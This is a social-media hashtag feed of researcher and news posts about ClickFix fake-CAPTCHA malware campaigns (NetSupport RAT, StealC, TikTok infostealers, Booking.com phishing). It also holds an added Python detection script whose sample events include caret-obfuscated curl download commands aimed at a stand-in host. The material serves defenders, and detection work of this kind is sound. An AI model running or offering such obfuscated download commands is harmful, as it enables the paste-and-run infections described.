#Clickfix

2025-06-20

🚨 New malware alert: Mocha Manakin uses #Clickfix (fakeCAPTCHA) to trick users into deploying a custom backdoor called NodeInitRAT. Red Canary warns it could lead to ransomware!

🔗 hackread.com/mocha-manakin-mal

#CyberSecurity #CyberAttack #fakeCAPTCHA #MochaManakin #NodeInitRAT

2025-06-18 (Wednesday): #SmartApeSG --> #ClickFix lure --> #NetSupportRAT --> #StealCv2

A #pcap of the traffic, the malware/artifacts, and some IOCs are available at malware-traffic-analysis.net/2.

Today's the 12th anniversary of my first blog post on malware-traffic-analysis.net, so I made this post a bit more old school.

HTML source of a page from a legitimate but compromised site showing the SmartApeSG injected script.

Example of a ClickFix-style page caused by the injected SmartApeSG script. A victim must click to get the popup and follow the instructions to paste and run the malicious script.

Traffic from an infection filtered in Wireshark. This shows the NetSupport RAT C2 traffic and StealC v2 traffic.

2025-06-18

"Famous Chollima deploying Python version of GolangGhost RAT" published by CiscoTalos. #ClickFix, #FamousChollima, #PylangGhost, #DPRK, #CTI blog.talosintelligence.com/pyt

2025-06-18

📢 Malware campaign using ClickFix to deploy ARECHCLIENT2
📝 Elastic Security Labs has detected an increase in campaigns using the **ClickFix** technique, a social engineering method that tricks users into executing mal...
📖 cyberveille: cyberveille.ch/posts/2025-06-1
🌐 source: elastic.co/security-labs/a-wre
#ARECHCLIENT2 #ClickFix #Cyberveille

Qiita - Popular articles (qiita@rss-mstdn.studiofreesia.com)
2025-06-07
2025-06-05

🚨 Researchers warn of a surge in #ClickFix scams impersonating #Booking.com. Fake CAPTCHAs trick users into running malware like XWorm and DanaBot.

Read: hackread.com/clickfix-email-sc

#CyberSecurity #Malware #Phishing #XWorm #DanaBot #Scam

2025-06-05

Ran into a ClickFix incident where the commands were obfuscated like: "c^u^rl.e^x^e"

Probably worth flagging on commands that contain excessive carets and have a parent process of explorer.exe or conhost.exe

#clickfix #intel #cybersecurity #blueteam #incidentresponse
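A defender-side triage sketch for the caret-obfuscation idea in the post above (an added example, not the poster's code): it undoes cmd.exe caret escaping so the real binary name becomes visible, counts the carets removed, and flags an event only when the count is high and the parent process is explorer.exe or conhost.exe. The sample events, the threshold and the parent set are constructed assumptions.

```python
from __future__ import annotations

# Parents a ClickFix-style paste-and-run typically originates from: the user pasted
# into a Run box or console, rather than a script or scheduler spawning the command.
INTERACTIVE_PARENTS = {"explorer.exe", "conhost.exe"}
CARET_THRESHOLD = 3  # assumption: legitimate batch escaping rarely stacks this many


def decaret(cmdline: str) -> tuple[str, int]:
    """Undo cmd.exe caret escaping: '^x' -> 'x' and '^^' -> '^'.

    Returns the normalized command line and the number of escape carets removed,
    so 'c^u^rl.e^x^e' becomes ('curl.exe', 4).
    """
    out: list[str] = []
    carets = 0
    i = 0
    while i < len(cmdline):
        if cmdline[i] == "^" and i + 1 < len(cmdline):
            carets += 1
            out.append(cmdline[i + 1])  # keep the escaped character, drop the caret
            i += 2
        else:
            out.append(cmdline[i])
            i += 1
    return "".join(out), carets


def triage(event: dict, threshold: int = CARET_THRESHOLD) -> dict:
    """Flag a process-creation event when heavy caret use meets an interactive parent."""
    normalized, carets = decaret(event["cmd"])
    parent = event["parent"].lower()
    return {
        "parent": parent,
        "carets": carets,
        "normalized": normalized,
        "suspicious": carets >= threshold and parent in INTERACTIVE_PARENTS,
    }


def scan(events: list[dict]) -> list[dict]:
    return [triage(e) for e in events]


# Constructed sample events (not real telemetry). The first and last mimic the
# obfuscated curl launch from the post; the middle two are benign noise.
SAMPLE_EVENTS = [
    {"parent": "explorer.exe", "cmd": "cmd /c c^u^rl.e^x^e -s http://example.invalid/i.txt"},
    {"parent": "cmd.exe", "cmd": "echo ^<html^> > out.txt"},  # batch escaping, scripted parent
    {"parent": "explorer.exe", "cmd": r"notepad.exe C:\Users\u\notes.txt"},
    {"parent": "conhost.exe", "cmd": "c^u^r^l.e^x^e --silent http://example.invalid/p"},
]

if __name__ == "__main__":
    for r in scan(SAMPLE_EVENTS):
        print(("ALERT " if r["suspicious"] else "ok    ") + r["normalized"])
```

The caret count is a weak signal on its own; pairing it with the interactive parent, as the post suggests, is what keeps batch files that legitimately escape `<`, `>` or `&` from firing.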

☀️ Summer is Here and So Are Fake Bookings 🎣
🚨 #Phishing emails disguised as #booking confirmations are heating up during this summer travel season, using #ClickFix techniques to deliver #malware.
Fake Booking.com emails typically request payment confirmation or additional service fees, urging victims to interact with malicious payloads.
👨‍💻 Fake payment form analysis session: app.any.run/tasks/84cffd74-ab8

🔍 A quick search in Threat Intelligence Lookup reveals a clear spike in activity during May-June. Use this search request to find related domains, IPs, and sandbox analysis sessions:
intelligence.any.run/analysis/

Most recent samples use ClickFix, a #fakecaptcha where the victim is tricked into copy-pasting and running a #PowerShell downloader via terminal.
👨‍💻 ClickFix analysis session: app.any.run/tasks/2e5679ef-1b4

The downloaded executables belong to the #RAT malware families, giving attackers full remote access to infected systems.

❗️ How to stay safe from seasonal phishing threats during your vacation:
1️⃣ Validate sender domains. Emails from trusted booking providers, hotels, and airlines typically come from official domains such as @booking.com, @airline.com

2️⃣ Analyze suspicious files with #ANYRUN. Use #ANYRUN’s interactive sandbox to quickly detect threats, safely detonate phishing URLs, and observe malicious behavior in a controlled environment.

3️⃣ Only enter your personal data on trusted websites. Look for a valid HTTPS certificate and double-check that the site belongs to the real service.

4️⃣ Train staff on phishing and brand impersonation tactics, especially during peak travel periods.

🏝️ Have a safe and sweet vacation!

2025-05-30

Interlock ransomware: what you need to know - "We don’t just want payment; we want accountability." The malicious hackers behind the I... tripwire.com/state-of-security #ransomware #databreach #guestblog #interlock #clickfix #malware

2025-05-30

"We don’t just want payment; we want accountability." The malicious hackers behind the Interlock ransomware try to justify their attacks.

Learn more about what you need to know about Interlock in my article on the Tripwire blog.

tripwire.com/state-of-security

#cybersecurity #ransomware #clickfix

2025-05-29

Warning: 4 Types of Attacks Targeting Users on TikTok and Smartphones

1. What is ClickFix? ClickFix is an attack technique of the UI Redressing type (deceiving the user through the interface), in which the user's actions are covertly redirected by manipulating displayed elem…

maychu.top/2025/05/30/canh-bao

2025-05-25

Infostealers spread via TikTok and the ClickFix technique: technical details of the campaign

In recent weeks, security researchers have observed an unusual and effective malware campaign in which cybercriminals exploit TikTok's popularity to distribute infostealer malware (including Vidar, StealC and Latrodectus). The attack relies on the so-called ClickFix technique, which involves persuading users to run malicious PowerShell commands themselves. Below we present a detailed analysis of this campaign and...

#WBiegu #Clickfix #Malware #Rejestr #Sideloading #Tiktok

sekurak.pl/infostealery-rozprz

Herr Dennis 🖖🙂 (DennisKuester@norden.social)
2025-05-25

I don't know where you all hang out, but this might be important.

winfuture.de/news,151149.html

#ClickFix #TikTok #Malware

Brian Greenberg (brian_greenberg@infosec.exchange)
2025-05-23

🚨 Malware via TikTok? Believe it.

Hackers are using AI-generated TikTok videos to trick users into running PowerShell commands that drop info-stealers like Vidar and StealC — all through a tactic called ClickFix.

🧠 How it works:
📋 Copy content from the clipboard
⚠️ Paste & run it in PowerShell
💣 Malware executes — silently

This isn’t theoretical. It’s happening now.

As someone who teaches and works in this space — this is the kind of threat that blurs social engineering, platform trust, and user habit.

Stay sharp:
🔒 Train your teams
⚙️ Lock down script execution
🛑 Stop trusting random “fix” videos

#Cybersecurity #TikTokThreat #ClickFix #InfoStealer #SocialEngineering #security #privacy #cloud #infosec

thehackernews.com/2025/05/hack

2025-05-23

Another good deep dive into how some of these #ClickFix campaigns work, with #ioc included

#cybersecurity

From: @VirusBulletin
infosec.exchange/@VirusBulleti

2025-05-23

TikTok just got a new menace: AI-generated "tutorials" that trick you into running harmful commands. Could your next how-to video be putting your device at risk? Learn how ClickFix is redefining cyber scams.

thedefendopsdiaries.com/unmask

#clickfix
#tiktoksecurity
#cyberthreats
#malware
#socialengineering

2025-05-20

State-sponsored threat actors often leverage techniques first developed and deployed by cybercriminal actors. One example is #ClickFix, a highly effective technique that involves clever #socialengineering.

Listen as Proofpoint threat research experts Selena Larson, Sarah Sabotka, and Saher Naumaan deep dive into how modern #espionage and #cybercrime are increasingly blurring lines.

Stream DISCARDED now:
Apple Podcasts: brnw.ch/21wSNbM
Spotify: brnw.ch/21wSNbL
Web player: brnw.ch/21wSNbN
